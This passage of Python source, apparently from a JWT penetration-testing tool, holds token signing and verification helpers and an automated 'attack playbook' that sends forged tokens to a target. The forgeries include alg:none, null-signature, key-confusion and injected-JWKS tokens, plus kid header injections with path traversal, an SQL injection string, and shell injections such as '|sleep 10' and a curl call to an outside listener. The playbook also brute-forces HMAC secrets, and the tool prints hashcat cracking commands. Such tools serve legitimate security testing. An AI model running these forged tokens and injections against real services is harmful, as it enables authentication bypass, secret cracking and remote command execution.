cprintc("Invalid Private Key", "red") 807 | exit(1) 808 | newSig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=") 809 | return newSig, newContents.decode('UTF-8') 810 | 811 | def signTokenEC(headDict, paylDict, privKey, hashLength): 812 | newHead = headDict 813 | newHead["alg"] = "ES"+str(hashLength) 814 | key = ECC.import_key(open(config['crypto']['ecprivkey']).read()) 815 | newContents = genContents(newHead, paylDict) 816 | newContents = newContents.encode('UTF-8') 817 | if hashLength == 256: 818 | h = SHA256.new(newContents) 819 | elif hashLength == 384: 820 | h = SHA384.new(newContents) 821 | elif hashLength == 512: 822 | h = SHA512.new(newContents) 823 | else: 824 | cprintc("Invalid hash length", "red") 825 | exit(1) 826 | signer = DSS.new(key, 'fips-186-3') 827 | try: 828 | signature = signer.sign(h) 829 | except: 830 | cprintc("Invalid Private Key", "red") 831 | exit(1) 832 | newSig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=") 833 | return newSig, newContents.decode('UTF-8') 834 | 835 | def signTokenPSS(headDict, paylDict, privKey, hashLength): 836 | newHead = headDict 837 | newHead["alg"] = "PS"+str(hashLength) 838 | key = RSA.importKey(open(config['crypto']['privkey']).read()) 839 | newContents = genContents(newHead, paylDict) 840 | newContents = newContents.encode('UTF-8') 841 | if hashLength == 256: 842 | h = SHA256.new(newContents) 843 | elif hashLength == 384: 844 | h = SHA384.new(newContents) 845 | elif hashLength == 512: 846 | h = SHA512.new(newContents) 847 | else: 848 | cprintc("Invalid RSA hash length", "red") 849 | exit(1) 850 | try: 851 | signature = pss.new(key).sign(h) 852 | except: 853 | cprintc("Invalid Private Key", "red") 854 | exit(1) 855 | newSig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=") 856 | return newSig, newContents.decode('UTF-8') 857 | 858 | def verifyTokenRSA(headDict, paylDict, sig, pubKey): 859 | key = RSA.importKey(open(pubKey).read()) 860 | newContents = genContents(headDict, paylDict) 861 | newContents = newContents.encode('UTF-8') 862 | if "-" in sig: 863 | try: 864 | sig = base64.urlsafe_b64decode(sig) 865 | except: 866 | pass 867 | try: 868 | sig = base64.urlsafe_b64decode(sig+"=") 869 | except: 870 | pass 871 | try: 872 | sig = base64.urlsafe_b64decode(sig+"==") 873 | except: 874 | pass 875 | elif "+" in sig: 876 | try: 877 | sig = base64.b64decode(sig) 878 | except: 879 | pass 880 | try: 881 | sig = base64.b64decode(sig+"=") 882 | except: 883 | pass 884 | try: 885 | sig = base64.b64decode(sig+"==") 886 | except: 887 | pass 888 | else: 889 | cprintc("Signature not Base64 encoded HEX", "red") 890 | if headDict['alg'] == "RS256": 891 | h = SHA256.new(newContents) 892 | elif headDict['alg'] == "RS384": 893 | h = SHA384.new(newContents) 894 | elif headDict['alg'] == "RS512": 895 | h = SHA512.new(newContents) 896 | else: 897 | cprintc("Invalid RSA algorithm", "red") 898 | verifier = PKCS1_v1_5.new(key) 899 | try: 900 | valid = verifier.verify(h, sig) 901 | if valid: 902 | cprintc("RSA Signature is VALID", "green") 903 | valid = True 904 | else: 905 | cprintc("RSA Signature is INVALID", "red") 906 | valid = False 907 | except: 908 | cprintc("The Public Key is invalid", "red") 909 | return valid 910 | 911 | def verifyTokenEC(headDict, paylDict, sig, pubKey): 912 | newContents = genContents(headDict, paylDict) 913 | message = newContents.encode('UTF-8') 914 | if "-" in str(sig): 915 | try: 916 | signature = base64.urlsafe_b64decode(sig) 917 | except: 918 | pass 919 | try: 920 | signature = 
base64.urlsafe_b64decode(sig+"=") 921 | except: 922 | pass 923 | try: 924 | signature = base64.urlsafe_b64decode(sig+"==") 925 | except: 926 | pass 927 | elif "+" in str(sig): 928 | try: 929 | signature = base64.b64decode(sig) 930 | except: 931 | pass 932 | try: 933 | signature = base64.b64decode(sig+"=") 934 | except: 935 | pass 936 | try: 937 | signature = base64.b64decode(sig+"==") 938 | except: 939 | pass 940 | else: 941 | cprintc("Signature not Base64 encoded HEX", "red") 942 | if headDict['alg'] == "ES256": 943 | h = SHA256.new(message) 944 | elif headDict['alg'] == "ES384": 945 | h = SHA384.new(message) 946 | elif headDict['alg'] == "ES512": 947 | h = SHA512.new(message) 948 | else: 949 | cprintc("Invalid ECDSA algorithm", "red") 950 | pubkey = open(pubKey, "r") 951 | pub_key = ECC.import_key(pubkey.read()) 952 | verifier = DSS.new(pub_key, 'fips-186-3') 953 | try: 954 | verifier.verify(h, signature) 955 | cprintc("ECC Signature is VALID", "green") 956 | valid = True 957 | except: 958 | cprintc("ECC Signature is INVALID", "red") 959 | valid = False 960 | return valid 961 | 962 | def verifyTokenPSS(headDict, paylDict, sig, pubKey): 963 | key = RSA.importKey(open(pubKey).read()) 964 | newContents = genContents(headDict, paylDict) 965 | newContents = newContents.encode('UTF-8') 966 | if "-" in sig: 967 | try: 968 | sig = base64.urlsafe_b64decode(sig) 969 | except: 970 | pass 971 | try: 972 | sig = base64.urlsafe_b64decode(sig+"=") 973 | except: 974 | pass 975 | try: 976 | sig = base64.urlsafe_b64decode(sig+"==") 977 | except: 978 | pass 979 | elif "+" in sig: 980 | try: 981 | sig = base64.b64decode(sig) 982 | except: 983 | pass 984 | try: 985 | sig = base64.b64decode(sig+"=") 986 | except: 987 | pass 988 | try: 989 | sig = base64.b64decode(sig+"==") 990 | except: 991 | pass 992 | else: 993 | cprintc("Signature not Base64 encoded HEX", "red") 994 | if headDict['alg'] == "PS256": 995 | h = SHA256.new(newContents) 996 | elif headDict['alg'] == "PS384": 997 | h = SHA384.new(newContents) 998 | elif headDict['alg'] == "PS512": 999 | h = SHA512.new(newContents) 1000 | else: 1001 | cprintc("Invalid RSA algorithm", "red") 1002 | verifier = pss.new(key) 1003 | try: 1004 | valid = verifier.verify(h, sig) 1005 | cprintc("RSA-PSS Signature is VALID", "green") 1006 | valid = True 1007 | except: 1008 | cprintc("RSA-PSS Signature is INVALID", "red") 1009 | valid = False 1010 | return valid 1011 | 1012 | def exportJWKS(jku): 1013 | try: 1014 | kid = headDict["kid"] 1015 | newSig, newContents, newjwks, privKeyName, jwksName, fulljwks = jwksGen(headDict, paylDict, jku, config['crypto']['privkey'], kid) 1016 | except: 1017 | kid = "" 1018 | newSig, newContents, newjwks, privKeyName, jwksName, fulljwks = jwksGen(headDict, paylDict, jku, config['crypto']['privkey']) 1019 | return newContents, newSig 1020 | 1021 | def parseJWKS(jwksfile): 1022 | jwks = open(jwksfile, "r").read() 1023 | jwksDict = json.loads(jwks, object_pairs_hook=OrderedDict) 1024 | nowtime = int(datetime.now().timestamp()) 1025 | cprintc("JWKS Contents:", "cyan") 1026 | try: 1027 | keyLen = len(jwksDict["keys"]) 1028 | cprintc("Number of keys: "+str(keyLen), "cyan") 1029 | i = -1 1030 | for jkey in range(0,keyLen): 1031 | i += 1 1032 | cprintc("\n--------", "white") 1033 | try: 1034 | cprintc("Key "+str(i+1), "cyan") 1035 | kid = str(jwksDict["keys"][i]["kid"]) 1036 | cprintc("kid: "+kid, "cyan") 1037 | except: 1038 | kid = i 1039 | cprintc("Key "+str(i+1), "cyan") 1040 | for keyVal in jwksDict["keys"][i].items(): 1041 | keyVal = keyVal[0] 
1042 | cprintc("[+] "+keyVal+" = "+str(jwksDict["keys"][i][keyVal]), "green") 1043 | try: 1044 | x = str(jwksDict["keys"][i]["x"]) 1045 | y = str(jwksDict["keys"][i]["y"]) 1046 | cprintc("\nFound ECC key factors, generating a public key", "cyan") 1047 | pubkeyName = genECPubFromJWKS(x, y, kid, nowtime) 1048 | cprintc("[+] "+pubkeyName, "green") 1049 | cprintc("\nAttempting to verify token using "+pubkeyName, "cyan") 1050 | valid = verifyTokenEC(headDict, paylDict, sig, pubkeyName) 1051 | except: 1052 | pass 1053 | try: 1054 | n = str(jwksDict["keys"][i]["n"]) 1055 | e = str(jwksDict["keys"][i]["e"]) 1056 | cprintc("\nFound RSA key factors, generating a public key", "cyan") 1057 | pubkeyName = genRSAPubFromJWKS(n, e, kid, nowtime) 1058 | cprintc("[+] "+pubkeyName, "green") 1059 | cprintc("\nAttempting to verify token using "+pubkeyName, "cyan") 1060 | valid = verifyTokenRSA(headDict, paylDict, sig, pubkeyName) 1061 | except: 1062 | pass 1063 | except: 1064 | cprintc("Single key file", "white") 1065 | for jkey in jwksDict: 1066 | cprintc("[+] "+jkey+" = "+str(jwksDict[jkey]), "green") 1067 | try: 1068 | kid = 1 1069 | x = str(jwksDict["x"]) 1070 | y = str(jwksDict["y"]) 1071 | cprintc("\nFound ECC key factors, generating a public key", "cyan") 1072 | pubkeyName = genECPubFromJWKS(x, y, kid, nowtime) 1073 | cprintc("[+] "+pubkeyName, "green") 1074 | cprintc("\nAttempting to verify token using "+pubkeyName, "cyan") 1075 | valid = verifyTokenEC(headDict, paylDict, sig, pubkeyName) 1076 | except: 1077 | pass 1078 | try: 1079 | kid = 1 1080 | n = str(jwksDict["n"]) 1081 | e = str(jwksDict["e"]) 1082 | cprintc("\nFound RSA key factors, generating a public key", "cyan") 1083 | pubkeyName = genRSAPubFromJWKS(n, e, kid, nowtime) 1084 | cprintc("[+] "+pubkeyName, "green") 1085 | cprintc("\nAttempting to verify token using "+pubkeyName, "cyan") 1086 | valid = verifyTokenRSA(headDict, paylDict, sig, pubkeyName) 1087 | except: 1088 | pass 1089 | 1090 | def genECPubFromJWKS(x, y, kid, nowtime): 1091 | try: 1092 | x = int.from_bytes(base64.urlsafe_b64decode(x), byteorder='big') 1093 | except: 1094 | pass 1095 | try: 1096 | x = int.from_bytes(base64.urlsafe_b64decode(x+"="), byteorder='big') 1097 | except: 1098 | pass 1099 | try: 1100 | x = int.from_bytes(base64.urlsafe_b64decode(x+"=="), byteorder='big') 1101 | except: 1102 | pass 1103 | try: 1104 | y = int.from_bytes(base64.urlsafe_b64decode(y), byteorder='big') 1105 | except: 1106 | pass 1107 | try: 1108 | y = int.from_bytes(base64.urlsafe_b64decode(y+"="), byteorder='big') 1109 | except: 1110 | pass 1111 | try: 1112 | y = int.from_bytes(base64.urlsafe_b64decode(y+"=="), byteorder='big') 1113 | except: 1114 | pass 1115 | new_key = ECC.construct(curve='P-256', point_x=x, point_y=y) 1116 | pubKey = new_key.public_key().export_key(format="PEM")+"\n" 1117 | pubkeyName = "kid_"+str(kid)+"_"+str(nowtime)+".pem" 1118 | with open(pubkeyName, 'w') as test_pub_out: 1119 | test_pub_out.write(pubKey) 1120 | return pubkeyName 1121 | 1122 | def genRSAPubFromJWKS(n, e, kid, nowtime): 1123 | try: 1124 | n = int.from_bytes(base64.urlsafe_b64decode(n), byteorder='big') 1125 | except: 1126 | pass 1127 | try: 1128 | n = int.from_bytes(base64.urlsafe_b64decode(n+"="), byteorder='big') 1129 | except: 1130 | pass 1131 | try: 1132 | n = int.from_bytes(base64.urlsafe_b64decode(n+"=="), byteorder='big') 1133 | except: 1134 | pass 1135 | try: 1136 | e = int.from_bytes(base64.urlsafe_b64decode(e), byteorder='big') 1137 | except: 1138 | pass 1139 | try: 1140 | e = 
int.from_bytes(base64.urlsafe_b64decode(e+"="), byteorder='big') 1141 | except: 1142 | pass 1143 | try: 1144 | e = int.from_bytes(base64.urlsafe_b64decode(e+"=="), byteorder='big') 1145 | except: 1146 | pass 1147 | new_key = RSA.construct((n, e)) 1148 | pubKey = new_key.publickey().exportKey(format="PEM") 1149 | pubkeyName = "kid_"+str(kid)+"_"+str(nowtime)+".pem" 1150 | with open(pubkeyName, 'w') as test_pub_out: 1151 | test_pub_out.write(pubKey.decode()+"\n") 1152 | return pubkeyName 1153 | 1154 | def getVal(promptString): 1155 | newVal = input(promptString) 1156 | try: 1157 | newVal = json.loads(newVal) 1158 | except ValueError: 1159 | try: 1160 | newVal = json.loads(newVal.replace("'", '"')) 1161 | except ValueError: 1162 | pass 1163 | return newVal 1164 | 1165 | def genContents(headDict, paylDict, newContents=""): 1166 | if paylDict == {}: 1167 | newContents = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"." 1168 | else: 1169 | newContents = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 1170 | return newContents.encode().decode('UTF-8') 1171 | 1172 | def dissectPayl(paylDict, count=False): 1173 | timeseen = 0 1174 | comparestamps = [] 1175 | countval = 0 1176 | expiredtoken = False 1177 | nowtime = int(datetime.now().timestamp()) 1178 | for claim in paylDict: 1179 | countval += 1 1180 | if count: 1181 | placeholder = str(countval) 1182 | else: 1183 | placeholder = "+" 1184 | if claim in ["exp", "nbf", "iat"]: 1185 | timestamp = datetime.fromtimestamp(int(paylDict[claim])) 1186 | if claim == "exp": 1187 | if int(timestamp.timestamp()) < nowtime: 1188 | expiredtoken = True 1189 | cprintc("["+placeholder+"] "+claim+" = "+str(paylDict[claim])+" ==> TIMESTAMP = "+timestamp.strftime('%Y-%m-%d %H:%M:%S')+" (UTC)", "green") 1190 | timeseen += 1 1191 | comparestamps.append(claim) 1192 | elif isinstance(paylDict[claim], dict): 1193 | cprintc("["+placeholder+"] "+claim+" = JSON object:", "green") 1194 | for subclaim in paylDict[claim]: 1195 | if type(castInput(paylDict[claim][subclaim])) == str: 1196 | cprintc(" [+] "+subclaim+" = \""+str(paylDict[claim][subclaim])+"\"", "green") 1197 | elif paylDict[claim][subclaim] == None: 1198 | cprintc(" [+] "+subclaim+" = null", "green") 1199 | elif paylDict[claim][subclaim] == True and not paylDict[claim][subclaim] == 1: 1200 | cprintc(" [+] "+subclaim+" = true", "green") 1201 | elif paylDict[claim][subclaim] == False and not paylDict[claim][subclaim] == 0: 1202 | cprintc(" [+] "+subclaim+" = false", "green") 1203 | else: 1204 | cprintc(" [+] "+subclaim+" = "+str(paylDict[claim][subclaim]), "green") 1205 | else: 1206 | if type(paylDict[claim]) == str: 1207 | cprintc("["+placeholder+"] "+claim+" = \""+str(paylDict[claim])+"\"", "green") 1208 | else: 1209 | cprintc("["+placeholder+"] "+claim+" = "+str(paylDict[claim]), "green") 1210 | return comparestamps, expiredtoken 1211 | 1212 | def validateToken(jwt): 1213 | try: 1214 | headB64, paylB64, sig = jwt.split(".",3) 1215 | except: 1216 | cprintc("[-] Invalid token:\nNot 3 parts -> header.payload.signature", "red") 1217 | exit(1) 1218 | try: 1219 | sig = base64.urlsafe_b64encode(base64.urlsafe_b64decode(sig + "=" * (-len(sig) % 4))).decode('UTF-8').strip("=") 1220 | except: 1221 | cprintc("[-] Invalid token:\nCould not base64-decode SIGNATURE - incorrect formatting/invalid characters", 
"red") 1222 | cprintc("----------------", "white") 1223 | cprintc(headB64, "cyan") 1224 | cprintc(paylB64, "cyan") 1225 | cprintc(sig, "red") 1226 | exit(1) 1227 | contents = headB64+"."+paylB64 1228 | contents = contents.encode() 1229 | try: 1230 | head = base64.urlsafe_b64decode(headB64 + "=" * (-len(headB64) % 4)) 1231 | except: 1232 | cprintc("[-] Invalid token:\nCould not base64-decode HEADER - incorrect formatting/invalid characters", "red") 1233 | cprintc("----------------", "white") 1234 | cprintc(headB64, "red") 1235 | cprintc(paylB64, "cyan") 1236 | cprintc(sig, "cyan") 1237 | exit(1) 1238 | try: 1239 | payl = base64.urlsafe_b64decode(paylB64 + "=" * (-len(paylB64) % 4)) 1240 | except: 1241 | cprintc("[-] Invalid token:\nCould not base64-decode PAYLOAD - incorrect formatting/invalid characters", "red") 1242 | cprintc("----------------", "white") 1243 | cprintc(headB64, "cyan") 1244 | cprintc(paylB64, "red") 1245 | cprintc(sig, "cyan") 1246 | exit(1) 1247 | try: 1248 | headDict = json.loads(head, object_pairs_hook=OrderedDict) 1249 | except: 1250 | cprintc("[-] Invalid token:\nHEADER not valid JSON format", "red") 1251 | 1252 | cprintc(head.decode('UTF-8'), "red") 1253 | exit(1) 1254 | if payl.decode() == "": 1255 | cprintc("Payload is blank", "white") 1256 | paylDict = {} 1257 | else: 1258 | try: 1259 | paylDict = json.loads(payl, object_pairs_hook=OrderedDict) 1260 | except: 1261 | cprintc("[-] Invalid token:\nPAYLOAD not valid JSON format", "red") 1262 | cprintc(payl.decode('UTF-8'), "red") 1263 | exit(1) 1264 | if args.verbose: 1265 | cprintc("Token: "+head.decode()+"."+payl.decode()+"."+sig+"\n", "green") 1266 | return headDict, paylDict, sig, contents 1267 | 1268 | def rejigToken(headDict, paylDict, sig): 1269 | cprintc("=====================\nDecoded Token Values:\n=====================", "white") 1270 | cprintc("\nToken header values:", "white") 1271 | for claim in headDict: 1272 | if isinstance(headDict[claim], dict): 1273 | cprintc("[+] "+claim+" = JSON object:", "green") 1274 | for subclaim in headDict[claim]: 1275 | if headDict[claim][subclaim] == None: 1276 | cprintc(" [+] "+subclaim+" = null", "green") 1277 | elif headDict[claim][subclaim] == True: 1278 | cprintc(" [+] "+subclaim+" = true", "green") 1279 | elif headDict[claim][subclaim] == False: 1280 | cprintc(" [+] "+subclaim+" = false", "green") 1281 | elif type(headDict[claim][subclaim]) == str: 1282 | cprintc(" [+] "+subclaim+" = \""+str(headDict[claim][subclaim])+"\"", "green") 1283 | else: 1284 | cprintc(" [+] "+subclaim+" = "+str(headDict[claim][subclaim]), "green") 1285 | else: 1286 | if type(headDict[claim]) == str: 1287 | cprintc("[+] "+claim+" = \""+str(headDict[claim])+"\"", "green") 1288 | else: 1289 | cprintc("[+] "+claim+" = "+str(headDict[claim]), "green") 1290 | cprintc("\nToken payload values:", "white") 1291 | comparestamps, expiredtoken = dissectPayl(paylDict) 1292 | if len(comparestamps) >= 2: 1293 | cprintc("\nSeen timestamps:", "white") 1294 | cprintc("[*] "+comparestamps[0]+" was seen", "green") 1295 | claimnum = 0 1296 | for claim in comparestamps: 1297 | timeoff = int(paylDict[comparestamps[claimnum]])-int(paylDict[comparestamps[0]]) 1298 | if timeoff != 0: 1299 | timecalc = timeoff 1300 | if timecalc < 0: 1301 | timecalc = timecalc*-1 1302 | days,hours,mins = 0,0,0 1303 | if timecalc >= 86400: 1304 | days = str(timecalc/86400) 1305 | days = int(float(days)) 1306 | timecalc -= days*86400 1307 | if timecalc >= 3600: 1308 | hours = str(timecalc/3600) 1309 | hours = int(float(hours)) 1310 | 
timecalc -= hours*3600 1311 | if timecalc >= 60: 1312 | mins = str(timecalc/60) 1313 | mins = int(float(mins)) 1314 | timecalc -= mins*60 1315 | if timeoff < 0: 1316 | timeoff = timeoff*-1 1317 | prepost = "[*] "+claim+" is earlier than "+comparestamps[0]+" by: " 1318 | cprintc(prepost+str(days)+" days, "+str(hours)+" hours, "+str(mins)+" mins", "green") 1319 | else: 1320 | prepost = "[*] "+claim+" is later than "+comparestamps[0]+" by: " 1321 | cprintc(prepost+str(days)+" days, "+str(hours)+" hours, "+str(mins)+" mins", "green") 1322 | claimnum += 1 1323 | if expiredtoken: 1324 | cprintc("[-] TOKEN IS EXPIRED!", "red") 1325 | cprintc("\n----------------------\nJWT common timestamps:\niat = IssuedAt\nexp = Expires\nnbf = NotBefore\n----------------------\n", "white") 1326 | if args.targeturl and not args.crack and not args.exploit and not args.verify and not args.tamper and not args.sign: 1327 | cprintc("[+] Sending token", "cyan") 1328 | newContents = genContents(headDict, paylDict) 1329 | jwtOut(newContents+"."+sig, "Sending token") 1330 | return headDict, paylDict, sig 1331 | 1332 | def searchLog(logID): 1333 | qResult = "" 1334 | with open(logFilename, 'r') as logFile: 1335 | logLine = logFile.readline() 1336 | while logLine: 1337 | if re.search('^'+logID, logLine): 1338 | qResult = logLine 1339 | break 1340 | else: 1341 | logLine = logFile.readline() 1342 | if qResult: 1343 | qOutput = re.sub(' - eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', '', qResult) 1344 | qOutput = re.sub(logID+' - ', '', qOutput) 1345 | try: 1346 | jwt = re.findall('eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', qResult)[-1] 1347 | except: 1348 | cprintc("JWT not included in log", "red") 1349 | exit(1) 1350 | cprintc(logID+"\n"+qOutput, "green") 1351 | cprintc("JWT from request:", "cyan") 1352 | cprintc(jwt, "green") 1353 | # headDict, paylDict, sig, contents = validateToken(jwt) 1354 | # rejigToken(headDict, paylDict, sig) 1355 | return jwt 1356 | else: 1357 | cprintc("ID not found in logfile", "red") 1358 | 1359 | def injectOut(newheadDict, newpaylDict): 1360 | if not args.crack and not args.exploit and not args.verify and not args.tamper and not args.sign: 1361 | desc = "Injected token with unchanged signature" 1362 | jwtOut(newContents+"."+sig, "Injected claim", desc) 1363 | elif args.sign: 1364 | signingToken(newheadDict, newpaylDict) 1365 | else: 1366 | runActions() 1367 | 1368 | def scanModePlaybook(): 1369 | cprintc("\nLAUNCHING SCAN: JWT Attack Playbook", "magenta") 1370 | origalg = headDict["alg"] 1371 | # No token 1372 | tmpCookies = config['argvals']['cookies'] 1373 | tmpHeader = config['argvals']['header'] 1374 | if config['argvals']['headerloc'] == "cookies": 1375 | config['argvals']['cookies'] = strip_dict_cookies(config['argvals']['cookies']) 1376 | elif config['argvals']['headerloc'] == "headers": 1377 | config['argvals']['header'] = "" 1378 | config['argvals']['overridesub'] = "true" 1379 | config['argvals']['cookies'] = tmpCookies 1380 | config['argvals']['header'] = tmpHeader 1381 | # Broken sig 1382 | jwtTweak = contents.decode()+"."+sig[:-4] 1383 | jwtOut(jwtTweak, "Broken signature", "This token was sent to check if the signature is being checked") 1384 | # Persistent 1385 | jwtOut(jwt, "Persistence check 1 (should always be valid)", "Original token sent to check if tokens work after invalid submissions") 1386 | # Claim processing order - check reflected output in all claims 1387 | reflectedClaims() 1388 | jwtOut(jwt, "Persistence check 2 (should 
always be valid)", "Original token sent to check if tokens work after invalid submissions") 1389 | # Weak HMAC secret 1390 | if headDict['alg'][:2] == "HS" or headDict['alg'][:2] == "hs": 1391 | cprintc("Testing "+headDict['alg']+" token against common JWT secrets (jwt-common.txt)", "cyan") 1392 | config['argvals']['keyList'] = "jwt-common.txt" 1393 | crackSig(sig, contents) 1394 | # Exploit: blank password accepted in signature 1395 | key = "" 1396 | newSig, newContents = signTokenHS(headDict, paylDict, key, 256) 1397 | jwtBlankPw = newContents+"."+newSig 1398 | jwtOut(jwtBlankPw, "Exploit: Blank password accepted in signature (-X b)", "This token can exploit a hard-coded blank password in the config") 1399 | # Exploit: null signature 1400 | jwtNull = checkNullSig(contents) 1401 | jwtOut(jwtNull, "Exploit: Null signature (-X n)", "This token was sent to check if a null signature can bypass checks") 1402 | # Exploit: alg:none 1403 | noneToks = checkAlgNone(headDict, paylB64) 1404 | zippedToks = dict(zip(noneToks, ["\"alg\":\"none\"", "\"alg\":\"None\"", "\"alg\":\"NONE\"", "\"alg\":\"nOnE\""])) 1405 | for noneTok in zippedToks: 1406 | jwtOut(noneTok, "Exploit: "+zippedToks[noneTok]+" (-X a)", "Testing whether the None algorithm is accepted - which allows forging unsigned tokens") 1407 | # Exploit: key confusion - use provided PubKey 1408 | if config['crypto']['pubkey']: 1409 | newTok, newSig = checkPubKeyExploit(headDict, paylB64, config['crypto']['pubkey']) 1410 | jwtOut(newTok+"."+newSig, "Exploit: RSA Key Confusion Exploit (provided Public Key)") 1411 | headDict["alg"] = origalg 1412 | # Exploit: jwks injection 1413 | try: 1414 | origjwk = headDict["jwk"] 1415 | except: 1416 | origjwk = False 1417 | jwksig, jwksContents = jwksEmbed(headDict, paylDict) 1418 | jwtOut(jwksContents+"."+jwksig, "Exploit: Injected JWKS (-X i)") 1419 | headDict["alg"] = origalg 1420 | if origjwk: 1421 | headDict["jwk"] = origjwk 1422 | else: 1423 | del headDict["jwk"] 1424 | # Exploit: spoof jwks 1425 | try: 1426 | origjku = headDict["jku"] 1427 | except: 1428 | origjku = False 1429 | jku = config['services']['jwksloc'] 1430 | newContents, newSig = exportJWKS(jku) 1431 | jwtOut(newContents+"."+newSig, "Exploit: Spoof JWKS (-X s)", "Signed with JWKS at "+config['services']['jwksloc']) 1432 | if origjku: 1433 | headDict["jku"] = origjku 1434 | else: 1435 | del headDict["jku"] 1436 | headDict["alg"] = origalg 1437 | # kid testing... 
start 1438 | try: 1439 | origkid = headDict["kid"] 1440 | except: 1441 | origkid = False 1442 | # kid inject: blank field, sign with null 1443 | newheadDict, newHeadB64 = injectheaderclaim("kid", "") 1444 | key = open("null.txt").read() 1445 | newSig, newContents = signTokenHS(newheadDict, paylDict, key, 256) 1446 | jwtOut(newContents+"."+newSig, "Injected kid claim - null-signed with blank kid") 1447 | # kid inject: path traversal - known path - check for robots.txt, sign with variations of location 1448 | newheadDict, newHeadB64 = injectheaderclaim("kid", "../../../../../../dev/null") 1449 | key = open("null.txt").read() 1450 | newSig, newContents = signTokenHS(newheadDict, paylDict, key, 256) 1451 | jwtOut(newContents+"."+newSig, "Injected kid claim - null-signed with kid=\"[path traversal]/dev/null\"") 1452 | newheadDict, newHeadB64 = injectheaderclaim("kid", "/dev/null") 1453 | key = open("null.txt").read() 1454 | newSig, newContents = signTokenHS(newheadDict, paylDict, key, 256) 1455 | jwtOut(newContents+"."+newSig, "Injected kid claim - null-signed with kid=\"/dev/null\"") 1456 | # kid inject: path traversal - bad path - sign with null 1457 | newheadDict, newHeadB64 = injectheaderclaim("kid", "/invalid_path") 1458 | key = open("null.txt").read() 1459 | newSig, newContents = signTokenHS(newheadDict, paylDict, key, 256) 1460 | jwtOut(newContents+"."+newSig, "Injected kid claim - null-signed with kid=\"/invalid_path\"") 1461 | # kid inject: RCE - sign with null 1462 | newheadDict, newHeadB64 = injectheaderclaim("kid", "|sleep 10") 1463 | key = open("null.txt").read() 1464 | newSig, newContents = signTokenHS(newheadDict, paylDict, key, 256) 1465 | jwtOut(newContents+"."+newSig, "Injected kid claim - RCE attempt - SLEEP 10 (did this request pause?)") 1466 | if config['services']['httplistener']: 1467 | injectUrl = config['services']['httplistener']+"/RCE_in_kid" 1468 | newheadDict, newHeadB64 = injectheaderclaim("kid", "| curl "+injectUrl) 1469 | key = open("null.txt").read() 1470 | newSig, newContents = signTokenHS(newheadDict, paylDict, key, 256) 1471 | jwtOut(newContents+"."+newSig, "Injected kid claim - RCE attempt - curl "+injectUrl+" (did this URL get accessed?)") 1472 | # kid inject: SQLi explicit value 1473 | newheadDict, newHeadB64 = injectheaderclaim("kid", "x' UNION SELECT '1';--") 1474 | key = "1" 1475 | newSig, newContents = signTokenHS(newheadDict, paylDict, key, 256) 1476 | jwtOut(newContents+"."+newSig, "Injected kid claim - signed with secret = '1' from SQLi") 1477 | # kid testing... 
end 1478 | if origkid: 1479 | headDict["kid"] = origkid 1480 | else: 1481 | del headDict["kid"] 1482 | headDict["alg"] = origalg 1483 | # x5u external 1484 | # Force External Interactions 1485 | if config['services']['httplistener']: 1486 | for headerClaim in headDict: 1487 | injectExternalInteractionHeader(config['services']['httplistener']+"/inject_existing_", headerClaim) 1488 | for payloadClaim in paylDict: 1489 | injectExternalInteractionPayload(config['services']['httplistener']+"/inject_existing_", payloadClaim) 1490 | cprintc("External service interactions have been tested - check your listener for interactions", "green") 1491 | else: 1492 | cprintc("External service interactions not tested - enter listener URL into 'jwtconf.ini' to try this option", "red") 1493 | # Accept Common HMAC secret (as alternative signature) 1494 | with open(config['input']['wordlist']) as commonPassList: 1495 | commonPass = commonPassList.readline().rstrip() 1496 | while commonPass: 1497 | newSig, newContents = signTokenHS(headDict, paylDict, commonPass, 256) 1498 | jwtOut(newContents+"."+newSig, "Checking for alternative accepted HMAC signatures, based on common passwords. Testing: "+commonPass+"", "This token can exploit a hard-coded common password in the config") 1499 | commonPass = commonPassList.readline().rstrip() 1500 | # SCAN COMPLETE 1501 | cprintc("Scanning mode completed: review the above results.\n", "magenta") 1502 | # Further manual testing: check expired token, brute key, find Public Key, run other scans 1503 | cprintc("The following additional checks should be performed that are better tested manually:", "magenta") 1504 | if headDict['alg'][:2] == "HS" or headDict['alg'][:2] == "hs": 1505 | cprintc("[+] Try testing "+headDict['alg'][:2]+" token against weak password configurations by running the following hashcat cracking options:", "green") 1506 | cprintc("(Already testing against passwords in jwt-common.txt)", "cyan") 1507 | cprintc("Try using longer dictionaries, custom dictionaries, mangling rules, or brute force attacks.\nhashcat (https://hashcat.net/hashcat/) is ideal for this as it is highly optimised for speed. Just add your JWT to a text file, then use the following syntax to give you a good start:\n\n[*] dictionary attacks: hashcat -a 0 -m 16500 jwt.txt passlist.txt\n[*] rule-based attack: hashcat -a 0 -m 16500 jwt.txt passlist.txt -r rules/best64.rule\n[*] brute-force attack: hashcat -a 3 -m 16500 jwt.txt ?u?l?l?l?l?l?l?l -i --increment-min=6", "cyan") 1508 | if headDict['alg'][:2] != "HS" and headDict['alg'][:2] != "hs": 1509 | cprintc("[+] Try hunting for a Public Key for this token. 
Validate any JWKS you find (-V -jw [jwks_file]) and then use the generated Public Key file with the Playbook Scan (-pk [kid_from_jwks].pem)", "green") 1510 | cprintc("Common locations for Public Keys are either the web application's SSL key, or stored as a JWKS file in one of these locations:", "cyan") 1511 | with open('jwks-common.txt', "r", encoding='utf-8', errors='ignore') as jwksLst: 1512 | nextVal = jwksLst.readline().rstrip() 1513 | while nextVal: 1514 | cprintc(nextVal, "cyan") 1515 | nextVal = jwksLst.readline().rstrip() 1516 | try: 1517 | timestamp = datetime.fromtimestamp(int(paylDict['exp'])) 1518 | cprintc("[+] Try waiting for the token to expire (\"exp\" value set to: "+timestamp.strftime('%Y-%m-%d %H:%M:%S')+" (UTC))", "green") 1519 | cprintc("Check if still working once expired.", "cyan") 1520 | except: 1521 | pass 1522 | 1523 | def scanModeErrors(): 1524 | cprintc("\nLAUNCHING SCAN: Forced Errors", "magenta") 1525 | # Inject dangerous content-types into existing 